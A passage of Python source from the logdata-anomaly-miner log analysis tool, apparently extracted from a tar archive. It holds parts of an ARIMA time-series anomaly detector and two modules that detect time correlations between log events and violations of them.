self.num_event_lines_ref]) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Import the persistence if persistence_data is not None: self.time_window_history = persistence_data[0] self.prediction_history = persistence_data[1] self.time_history = persistence_data[2] self.result_list = persistence_data[3] self.time_trigger_list = persistence_data[4] self.num_event_lines_ref = persistence_data[5] self.arima_models = [None for _ in self.time_window_history] for event_index in range(len(self.arima_models)): if len(self.time_window_history[event_index]) >= self.num_periods_tsa_ini * self.num_division_time_step: try: if not self.build_sum_over_values: model = ARIMA( self.time_window_history[event_index][-self.num_periods_tsa_ini * self.num_division_time_step:], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() else: model = ARIMA([sum(self.time_window_history[event_index][ -self.num_periods_tsa_ini * self.num_division_time_step + i: -(self.num_periods_tsa_ini - 1) * self.num_division_time_step + i]) for i in range((self.num_periods_tsa_ini - 1) * self.num_division_time_step)] + [ sum(self.time_window_history[event_index][-self.num_division_time_step:])], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except Exception: self.arima_models[event_index] = None self.time_window_history[event_index] = [] else: self.arima_models[event_index] = None self.time_window_history[event_index] = [] # List of the pauses of the tests to the event numbers. If an arima model was initialized with the persistence, the model must # be trained before it can be used for forecasts. An integer states how many tests should be skipped before the next # output to this event number. None if no model was initialized for this event number. self.test_pause = [self.num_division_time_step if arima_models_statsmodel is not None else None for arima_models_statsmodel in self.arima_models] # If all entries are None set the variable to None if all(entry is None for entry in self.test_pause): self.test_pause = None else: self.time_trigger_list[0].append(-1) self.time_trigger_list[1].append(-1) self.time_trigger_list[2].append(-1) def calculate_time_steps(self, counts, log_atom): """Returns a list of the timestep lengths in seconds, if no timestep should be created the value is set to -1.""" time_step_list = [] # List of the resulting time_steps self.time_window_history = [[] for _ in range(len(counts))] # Initialize time_window_history self.arima_models = [None for _ in range(len(counts))] # Initialize arima_models self.prediction_history = [[[], [], []] for _ in range(len(counts))] # Initialize prediction_history self.time_history = [[] for _ in range(len(counts))] # Initialize time_history self.result_list = [[1]*self.num_results_bt for _ in range(len(counts))] # Initialize the lists of the results if self.force_period_length: # Force the period length time_step_list = [self.set_period_length / self.num_division_time_step for _ in counts] else: # Minimal size of the time step min_lag = max(int(self.acf_pause_interval_percentage*self.num_sections_waiting_time), 1) for event_index, data in enumerate(counts): if (self.target_path_list != [] and all(path not in self.event_type_detector.found_keys[ event_index] for path in self.target_path_list)) or (self.ignore_list != [] and any( ignore_path in self.event_type_detector.found_keys[event_index] for ignore_path in self.ignore_list)): time_step_list.append(-1) else: # Apply the autocorrection function to the data of the single event types. corr = list(map(abs, acf(data, nlags=len(data), fft=True))) corr = np.array(corr) # Apply the Savitzky-Golay-Filter to the list corr, to smooth the curve and get better results corrfit = savgol_filter(corr, min(max(3, int(len(corr)/100)-int(int(len(corr)/100) % 2 == 0)), 101), 1) # Set the pause area automatically if self.acf_auto_pause_interval: # Find the first local minima, which is the minimum in the last and next self.acf_auto_pause_interval_num_min values for i in range(self.acf_auto_pause_interval_num_min, len(corrfit)-self.acf_auto_pause_interval_num_min): if corrfit[i] == min(corrfit[i-self.acf_auto_pause_interval_num_min: i+self.acf_auto_pause_interval_num_min+1]): min_lag = i break # Find the highest peak and set the time-step as the index + lag highest_peak_index = np.argmax(corrfit[min_lag:]) if corrfit[min_lag + highest_peak_index] > self.acf_threshold: time_step_list.append((highest_peak_index + min_lag) / self.num_division_time_step * self.waiting_time / self.num_sections_waiting_time) else: time_step_list.append(-1) # Round the time_steps if they are similar to the times in self.assumed_time_steps for index, time_step in enumerate(time_step_list): if time_step != -1: for assumed_time_step in self.assumed_time_steps: if abs(assumed_time_step - time_step * self.num_division_time_step) / assumed_time_step <\ self.round_time_interval_threshold: time_step_list[index] = assumed_time_step / self.num_division_time_step break for index, time_step in enumerate(time_step_list): if time_step_list[index] != -1 and sum(counts[index]) / len(counts[index]) * time_step_list[index] /\ self.waiting_time * self.num_sections_waiting_time <\ self.min_log_lines_per_time_step: time_step_list[index] = -1 # Print a message of the length of the time steps message = f"Calculated the periods for the single event types in seconds: "\ f'{[time_step * self.num_division_time_step if time_step != -1 else "None" for time_step in time_step_list]}' affected_path = [] self.print(message, log_atom, affected_path) return time_step_list def test_num_appearance(self, event_index, count, log_atom): """This function makes a one-step prediction and raises an alert if the count do not match the expected appearance.""" # Append the list of time_window_history and arima_models if it is to short if len(self.time_window_history) <= event_index: self.time_window_history += [[] for _ in range(event_index + 1 - len(self.time_window_history))] self.arima_models += [None for _ in range(event_index + 1 - len(self.arima_models))] self.prediction_history += [[[], [], []] for _ in range(event_index + 1 - len(self.prediction_history))] self.time_history += [[] for _ in range(event_index + 1 - len(self.time_history))] self.result_list += [[1]*self.num_results_bt for _ in range(event_index + 1 - len(self.result_list))] # Initialize the arima_model if needed if self.learn_mode and self.arima_models[event_index] is None: # Add the new count to the history and shorten it, if necessary self.time_window_history[event_index].append(count) if len(self.time_window_history[event_index]) > 2 * self.num_periods_tsa_ini * self.num_division_time_step: self.time_window_history[event_index] = self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step:] # Check if enough values have been stored to initialize the arima_model if len(self.time_window_history[event_index]) >= self.num_periods_tsa_ini*self.num_division_time_step: message = f"Initializing the TSA for the event {self.event_type_detector.get_event_type(event_index)}" affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) if not self.build_sum_over_values: # Add the arima_model to the list try: model = ARIMA( self.time_window_history[event_index][-self.num_periods_tsa_ini*self.num_division_time_step:], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except Exception: self.arima_models[event_index] = None else: # Add the arima_model to the list try: model = ARIMA([sum(self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step+i: -(self.num_periods_tsa_ini-1)*self.num_division_time_step+i]) for i in range((self.num_periods_tsa_ini-1)*self.num_division_time_step)]+[ sum(self.time_window_history[event_index][-self.num_division_time_step:])], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except Exception: self.arima_models[event_index] = None self.time_window_history[event_index] = [] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Add the new value and make a one-step prediction elif self.arima_models[event_index] is not None: if not self.build_sum_over_values: # Add the prediction and time to the lists lower_limit, upper_limit = self.one_step_prediction(event_index) if self.test_pause is not None and len(self.test_pause) > event_index and self.test_pause[event_index] is not None: self.prediction_history[event_index][0].append(0) self.prediction_history[event_index][1].append(count) self.prediction_history[event_index][2].append(0) self.time_history[event_index].append(log_atom.atom_time) else: self.prediction_history[event_index][0].append(lower_limit) self.prediction_history[event_index][1].append(count) self.prediction_history[event_index][2].append(upper_limit) self.time_history[event_index].append(log_atom.atom_time) # Shorten the lists if necessary if len(self.time_history[event_index]) > self.num_max_time_history: self.prediction_history[event_index][0] = self.prediction_history[event_index][0][-self.num_min_time_history:] self.prediction_history[event_index][1] = self.prediction_history[event_index][1][-self.num_min_time_history:] self.prediction_history[event_index][2] = self.prediction_history[event_index][2][-self.num_min_time_history:] self.time_history[event_index] = self.time_history[event_index][-self.num_min_time_history:] if self.test_pause is not None and len(self.test_pause) > event_index and self.test_pause[event_index] is not None: if self.test_pause[event_index] == 1: self.test_pause[event_index] = None # If all entries are None set the variable to None if all(entry is None for entry in self.test_pause): self.test_pause = None else: self.test_pause[event_index] -= 1 else: # Test if count is in boundaries if count < lower_limit or count > upper_limit: message = f"Event: {self.event_type_detector.get_event_type(event_index)}, Lower: {lower_limit}, Count: {count}, "\ f"Upper: {upper_limit}" affected_path = self.event_type_detector.variable_key_list[event_index] if count < lower_limit: confidence = (lower_limit - count) / (upper_limit - count) else: confidence = (count - upper_limit) / (count - lower_limit) self.print(message, log_atom, affected_path, confidence=confidence) self.result_list[event_index].append(0) else: self.result_list[event_index].append(1) if len(self.result_list[event_index]) >= 2 * self.num_results_bt: self.result_list[event_index] = self.result_list[event_index][-self.num_results_bt:] # Discard or update the model, for the next step if self.learn_mode and sum(self.result_list[event_index][-self.num_results_bt:]) < self.bt_min_suc: message = f"Discard the TSA model for the event {self.event_type_detector.get_event_type(event_index)}" affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) # Discard the trained model and reset the result_list self.arima_models[event_index] = None self.result_list[event_index] = [1]*self.num_results_bt if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: # Update the model self.arima_models[event_index] = self.arima_models[event_index].append([count]) else: # Add the new count to the history and shorten it, if necessary self.time_window_history[event_index].append(count) count_sum = sum(self.time_window_history[event_index][-self.num_division_time_step:]) # Add the prediction and time to the lists lower_limit, upper_limit = self.one_step_prediction(event_index) self.prediction_history[event_index][0].append(lower_limit) self.prediction_history[event_index][1].append(count_sum) self.prediction_history[event_index][2].append(upper_limit) self.time_history[event_index].append(log_atom.atom_time) # Shorten the lists if necessary if len(self.time_history[event_index]) > self.num_max_time_history: self.prediction_history[event_index][0] = self.prediction_history[event_index][0][-self.num_min_time_history:] self.prediction_history[event_index][1] = self.prediction_history[event_index][1][-self.num_min_time_history:] self.prediction_history[event_index][2] = self.prediction_history[event_index][2][-self.num_min_time_history:] self.time_history[event_index] = self.time_history[event_index][-self.num_min_time_history:] # Test if count_sum is in boundaries if count_sum < lower_limit or count_sum > upper_limit: message = f"Event: {self.event_type_detector.get_event_type(event_index)}, Lower: {lower_limit}, Count: {count_sum}, "\ f"Upper: {upper_limit}" affected_path = self.event_type_detector.variable_key_list[event_index] confidence = 1 - min(count_sum / lower_limit, upper_limit / count_sum) self.print(message, log_atom, affected_path, confidence=confidence) # Update the model, for the next step self.arima_models[event_index] = self.arima_models[event_index].append([count_sum]) def one_step_prediction(self, event_index): """Make a one step prediction with the Arima model.""" prediction = self.arima_models[event_index].get_forecast(1) prediction = prediction.conf_int(alpha=self.alpha) # return in the order: lower_limit, upper_limit return prediction[0][0], prediction[0][1] def bt_min_successes(self, num_bt, p, alpha): """Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return i return num_bt def print(self, message, log_atom, affected_path, confidence=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = "" if self.output_logline: tmp_str = "" for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += " " + x + os.linesep tmp_str = tmp_str.lstrip(" ") sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = "" for x in affected_path: tmp_str += " " + x + os.linesep tmp_str = tmp_str.lstrip(" ") sorted_log_lines = [tmp_str + log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": affected_path} if confidence is not None: event_data = {"AnalysisComponent": analysis_component, "TotalRecords": self.event_type_detector.total_records, "TypeInfo": {"Confidence": confidence}} else: event_data = {"AnalysisComponent": analysis_component, "TotalRecords": self.event_type_detector.total_records, "TypeInfo": {}} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, log_atom, self) TimeCorrelationDetector.py000066400000000000000000000314131500476301700361150ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for time correlation between atoms. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from datetime import datetime import random import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.analysis import Rules from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.History import get_log_int class TimeCorrelationDetector(AtomHandlerInterface): """This class tries to find time correlation patterns between different log atoms. When a possible correlation rule is detected, it creates an event including the rules. This is useful to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, parallel_check_count, persistence_id="Default", record_count_before_event=10000, output_logline=True, use_path_match=True, use_value_match=True, min_rule_attributes=1, max_rule_attributes=5, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param parallel_check_count number of rule detection checks to run in parallel. @param persistence_id name of persistence file. @param record_count_before_event number of events used to calculate statistics (i.e., window size) @param output_logline specifies whether the full parsed log atom should be provided in the output. @param min_rule_attributes minimum number of attributes forming a rule @param max_rule_attributes maximum number of attributes forming a rule @param use_path_match if true rules are build based on path existence @param use_value_match if true rules are built based on actual values """ self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, parallel_check_count=parallel_check_count, persistence_id=persistence_id, record_count_before_event=record_count_before_event, output_logline=output_logline, use_path_match=use_path_match, use_value_match=use_value_match, min_rule_attributes=min_rule_attributes, max_rule_attributes=max_rule_attributes, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) self.last_timestamp = 0.0 self.last_unhandled_match = None self.total_records = 0 if min_rule_attributes <= 0 or min_rule_attributes > max_rule_attributes: msg = "min_rule_attributes must not be smaller than max_rule_attributes and bigger than or equal to zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.feature_list = [] self.event_count_table = [0] * parallel_check_count * parallel_check_count * 2 self.event_delta_table = [0] * parallel_check_count * parallel_check_count * 2 def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return False self.log_total += 1 event_data = {} timestamp = log_atom.get_timestamp() if timestamp < self.last_timestamp: for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", f"Logdata not sorted: last {self.last_timestamp}, current {timestamp}", [log_atom.parser_match.match_element.annotate_match("")], event_data, log_atom, self) return False self.last_timestamp = timestamp self.total_records += 1 features_found_list = [] for feature in self.feature_list: if feature.rule.match(log_atom): feature.trigger_count += 1 self.update_tables_for_feature(feature, timestamp) features_found_list.append(feature) if len(self.feature_list) < self.parallel_check_count: if (random.randint(0, 1) != 0) and (self.last_unhandled_match is not None): # nosec B311 log_atom = self.last_unhandled_match new_rule = self.create_random_rule(log_atom) if new_rule is not None: new_feature = CorrelationFeature(new_rule, len(self.feature_list), timestamp) self.feature_list.append(new_feature) new_feature.trigger_count = 1 self.update_tables_for_feature(new_feature, timestamp) features_found_list.append(new_feature) for feature in features_found_list: feature.last_trigger_time = timestamp if not features_found_list: self.last_unhandled_match = log_atom if (self.total_records % self.record_count_before_event) == 0: result = self.total_records * [""] result[0] = self.analysis_status_to_string() value = log_atom.raw_data if isinstance(value, bytes): value = value.decode(AminerConfig.ENCODING) analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary()), "AffectedLogAtomValues": [value]} if self.output_logline: feature_list = [] for feature in self.feature_list: tmp_list = {} r = self.rule_to_dict(feature.rule) tmp_list["Rule"] = r tmp_list["Index"] = feature.index tmp_list["CreationTime"] = feature.creation_time tmp_list["LastTriggerTime"] = feature.last_trigger_time tmp_list["TriggerCount"] = feature.trigger_count feature_list.append(tmp_list) analysis_component["FeatureList"] = feature_list analysis_component["AnalysisStatus"] = result[0] analysis_component["TotalRecords"] = self.total_records event_data["AnalysisComponent"] = analysis_component for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Correlation report", result, event_data, log_atom, self) self.reset_statistics() logging.getLogger(DEBUG_LOG_NAME).debug("%s ran analysis.", self.__class__.__name__) self.log_success += 1 return True def rule_to_dict(self, rule): """Convert a rule to a dict structure.""" r = {"type": str(rule.__class__.__name__)} for var in vars(rule): attr = getattr(rule, var, None) if attr is None: r[var] = None elif isinstance(attr, list): tmp_list = [] for v in attr: d = self.rule_to_dict(v) d["type"] = str(v.__class__.__name__) tmp_list.append(d) r["subRules"] = tmp_list else: r[var] = attr return r def create_random_rule(self, log_atom): """Create a random existing path rule or value match rule.""" parser_match = log_atom.parser_match sub_rules = [] all_keys = list(parser_match.get_match_dictionary().keys()) attribute_count = self.min_rule_attributes + get_log_int(self.max_rule_attributes - self.min_rule_attributes) while attribute_count > 0: key_pos = random.randint(0, len(all_keys) - 1) # nosec B311 key_name = all_keys[key_pos] all_keys = all_keys[:key_pos] + all_keys[key_pos + 1:] key_value = parser_match.get_match_dictionary().get(key_name).match_object # Not much sense handling parsed date values in this implementation, so just ignore this attribute. if (isinstance(key_value, tuple)) and (isinstance(key_value[0], datetime)): if not all_keys: break continue attribute_count -= 1 rule_type = 1 # default is value_match only if self.use_path_match and self.use_value_match: rule_type = random.randint(0, 1) # nosec B311 elif self.use_path_match: rule_type = 0 if rule_type == 0: sub_rules.append(Rules.PathExistsMatchRule(key_name)) else: sub_rules.append(Rules.ValueMatchRule(key_name, key_value)) if not all_keys: break if len(sub_rules) > 1: return Rules.AndMatchRule(sub_rules) if len(sub_rules) > 0: return sub_rules[0] return None def update_tables_for_feature(self, target_feature, timestamp): """Assume that this event was the effect of a previous cause-related event. Loop over all cause-related features (rows) to search for matches. """ feature_table_pos = (target_feature.index << 1) for feature in self.feature_list: delta = timestamp - feature.last_trigger_time if delta <= 10.0: self.event_count_table[feature_table_pos] += 1 self.event_delta_table[feature_table_pos] += int(delta * 1000) feature_table_pos += (self.parallel_check_count << 1) feature_table_pos = ((target_feature.index * self.parallel_check_count) << 1) + 1 for feature in self.feature_list: delta = timestamp - feature.last_trigger_time if delta <= 10.0: self.event_count_table[feature_table_pos] += 1 self.event_delta_table[feature_table_pos] -= int(delta * 1000) feature_table_pos += 2 def analysis_status_to_string(self): """Get a string representation of all features.""" result = "" for feature in self.feature_list: trigger_count = feature.trigger_count result += f"{feature.rule} ({feature.index}) e = {trigger_count}:" stat_pos = (self.parallel_check_count * feature.index) << 1 for feature_pos in range(len(self.feature_list)): event_count = self.event_count_table[stat_pos] ratio = "-" if trigger_count != 0: ratio = "%.2e" % (float(event_count) / trigger_count) delta = "-" if event_count != 0: delta = "%.2e" % (float(self.event_delta_table[stat_pos]) * 0.001 / event_count) result += "\n %d: {c = %#6d r = %s dt = %s" % (feature_pos, event_count, ratio, delta) stat_pos += 1 event_count = self.event_count_table[stat_pos] ratio = "-" if trigger_count != 0: ratio = "%.2e" % (float(event_count) / trigger_count) delta = "-" if event_count != 0: delta = "%.2e" % (float(self.event_delta_table[stat_pos]) * 0.001 / event_count) result += " c = %#6d r = %s dt = %s}" % (event_count, ratio, delta) stat_pos += 1 result += "\n" return result def reset_statistics(self): """Reset all features.""" for feature in self.feature_list: feature.creation_time = 0 feature.last_trigger_time = 0 feature.trigger_count = 0 self.event_count_table = [0] * self.parallel_check_count * self.parallel_check_count * 2 self.event_delta_table = [0] * self.parallel_check_count * self.parallel_check_count * 2 class CorrelationFeature: """This class defines a correlation feature.""" def __init__(self, rule, index, creation_time): self.rule = rule self.index = index self.creation_time = creation_time self.last_trigger_time = 0.0 self.trigger_count = 0 TimeCorrelationViolationDetector.py000066400000000000000000000463061500476301700400110ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for time correlation rules. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.History import LogarithmicBackoffHistory from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.analysis import Rules class TimeCorrelationViolationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class creates events when one of the given time correlation rules is violated. This is used to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006 """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, ruleset, anomaly_event_handlers, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param ruleset a list of MatchRule rules with appropriate CorrelationRules attached as actions. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ self.last_log_atom, self.next_persist_time, self.log_success, self.log_total = [None]*4 super().__init__(aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"]) self.ruleset = ruleset if not isinstance(ruleset, list) or not all(isinstance(x, Rules.MatchRule) for x in ruleset): msg = "ruleset must be a list of MatchRules." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) event_correlation_set = set() for rule in self.ruleset: if rule.match_action.artefact_a_rules is not None: event_correlation_set |= set(rule.match_action.artefact_a_rules) if rule.match_action.artefact_b_rules is not None: event_correlation_set |= set(rule.match_action.artefact_b_rules) self.event_correlation_ruleset = list(event_correlation_set) def receive_atom(self, log_atom): """Receive a parsed atom and evaluate all the classification rules and event triggering on violations.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return self.log_total += 1 self.last_log_atom = log_atom for rule in self.ruleset: rule.match(log_atom) self.log_success += 1 def do_timer(self, trigger_time): """Check for any rule violations and if the current ruleset should be persisted.""" # Check all correlation rules, generate single events for each violated rule, possibly containing multiple records. As we might # be processing historic data, the timestamp last seen is unknown here. Hence, rules not receiving newer events might not notice # for a long time, that they hold information about correlation impossible to fulfil. Take the newest timestamp of any rule # and use it for checking. newest_timestamp = 0.0 for rule in self.event_correlation_ruleset: newest_timestamp = max(newest_timestamp, rule.last_timestamp_seen) for rule in self.event_correlation_ruleset: check_result = rule.check_status(newest_timestamp) if check_result is None: continue self.last_log_atom.set_timestamp(trigger_time) r = {"RuleId": rule.rule_id, "MinTimeDelta": rule.min_time_delta, "MaxTimeDelta": rule.max_time_delta, "ArtefactMatchParameters": rule.artefact_match_parameters, "HistoryAEvents": rule.history_a_events, "HistoryBEvents": rule.history_b_events, "LastTimestampSeen": rule.last_timestamp_seen} history = {"MaxItems": rule.correlation_history.max_items} h = [] for item in rule.correlation_history.history: h.append(repr(item)) history["History"] = h r["correlation_history"] = history analysis_component = {"Rule": r, "CheckResult": check_result, "NewestTimestamp": newest_timestamp} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", f'Correlation rule "{rule.rule_id}" violated', [check_result[0]], event_data, self.last_log_atom, self) return 10.0 def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ super().log_statistics(component_name) for i, rule in enumerate(self.ruleset): rule.log_statistics(component_name + "." + rule.__class__.__name__ + str(i)) class EventClassSelector(Rules.MatchAction): """This match action selects one event class by adding it to a MatchRule. It then triggers the appropriate CorrelationRules. """ def __init__(self, action_id, artefact_a_rules, artefact_b_rules): if not isinstance(action_id, str): msg = "action_id must be a string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(action_id) == 0: msg = "action_id must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not artefact_a_rules and not artefact_b_rules: msg = "At least one of artefact_a_rules and artefact_b_rules must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not artefact_a_rules and isinstance(artefact_a_rules, (list, type(None))): artefact_a_rules = [] if not artefact_b_rules and isinstance(artefact_b_rules, (list, type(None))): artefact_b_rules = [] if not isinstance(artefact_a_rules, list) or not isinstance(artefact_b_rules, list) or \ not all(isinstance(x, CorrelationRule) for x in artefact_a_rules + artefact_b_rules): msg = "artefact_a_rules and artefact_b_rules must be lists of CorrelationRules." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.action_id = action_id self.artefact_a_rules = artefact_a_rules self.artefact_b_rules = artefact_b_rules def match_action(self, log_atom): """Invoke if a rule has matched. @param log_atom the parser match_element that was also matching the rules. """ if self.artefact_a_rules: for a_rule in self.artefact_a_rules: a_rule.update_artefact_a(self, log_atom) if self.artefact_b_rules: for b_rule in self.artefact_b_rules: b_rule.update_artefact_b(self, log_atom) class CorrelationRule: """This class defines a correlation rule to match artefacts A and B. A hidden event A* always triggers at least one artefact A and the hidden event B*, thus triggering also at least one artefact B. """ def __init__(self, rule_id, min_time_delta, max_time_delta, artefact_match_parameters=None, max_violations=20): """Create the correlation rule. @param rule_id a unique identifier of the rule. @param min_time_delta minimal delta in seconds, that artefact B may be observed after artefact A. Negative values are allowed as artefact B may be found before A. @param max_time_delta maximum delta in seconds, that artefact B may be observed after artefact A. Negative values are allowed as artefact B may be found before A. @param artefact_match_parameters if not none, two artefacts A and B will be only treated as correlated when all the parsed artefact attributes identified by the list of attribute path tuples match. """ self.rule_id = rule_id self.min_time_delta = min_time_delta self.max_time_delta = max_time_delta self.artefact_match_parameters = artefact_match_parameters self.max_violations = max_violations self.history_a_events = [] self.history_b_events = [] self.last_timestamp_seen = 0.0 self.correlation_history = LogarithmicBackoffHistory(10) if not isinstance(rule_id, str): msg = "rule_id must be a string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(rule_id) == 0: msg = "rule_id must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(min_time_delta, bool) or not isinstance(min_time_delta, (int, float)): msg = "min_time_delta must be integer or float." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(max_time_delta, bool) or not isinstance(max_time_delta, (int, float)): msg = "max_time_delta must be integer or float." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if min_time_delta >= max_time_delta or min_time_delta < 0: msg = "min_time_delta must be smaller than max_time_delta and both values must be bigger than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if artefact_match_parameters is not None and ( not isinstance(artefact_match_parameters, list) or not all(isinstance(x, tuple) and all(isinstance(y, str) for y in x) for x in artefact_match_parameters)): msg = "artefact_match_parameters must be a list of tuples of strings." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(max_violations, bool) or not isinstance(max_violations, int): msg = "max_violations must be integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def update_artefact_a(self, selector, log_atom): """Append entry to the event history A.""" history_entry = self.prepare_history_entry(selector, log_atom) # Check if event A could be discarded immediately. self.history_a_events.append(history_entry) def update_artefact_b(self, selector, log_atom): """Append entry to the event history B.""" history_entry = self.prepare_history_entry(selector, log_atom) # Check if event B could be discarded immediately. self.history_b_events.append(history_entry) def check_status(self, newest_timestamp): """@return None if status is OK. Return a tuple containing a descriptive message and a list of violating log data lines on error.""" # This part of code would be good target to be implemented as native library with optimized algorithm in the future. a_pos = 0 check_range = len(self.history_a_events) violation_logs = [] violation_message = "" num_violations = 0 while a_pos < check_range: deleted = False check_range = len(self.history_a_events) a_event = self.history_a_events[a_pos] if a_event is None: continue a_event_time = a_event[0] b_pos = 0 while b_pos < len(self.history_b_events): b_event = self.history_b_events[b_pos] if b_event is None: continue b_event_time = b_event[0] delta = b_event_time - a_event_time if delta < self.min_time_delta: # See if too early, if yes go to next element. As we will not check again any older aEvents in this loop, skip # all bEvents up to this position in future runs. if b_pos < len(self.history_b_events): violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations < self.max_violations: violation_message += f"FAIL: B-Event for \"{violation_line}\" ({a_event[2].action_id}) was found too" \ f" early!\n" violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 break continue # Too late, no other b_event may match this a_event if delta > self.max_time_delta: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations < self.max_violations: violation_message += f"FAIL: B-Event for \"{violation_line}\" ({ a_event[2].action_id}) was not found in" \ f" time!\n" violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True 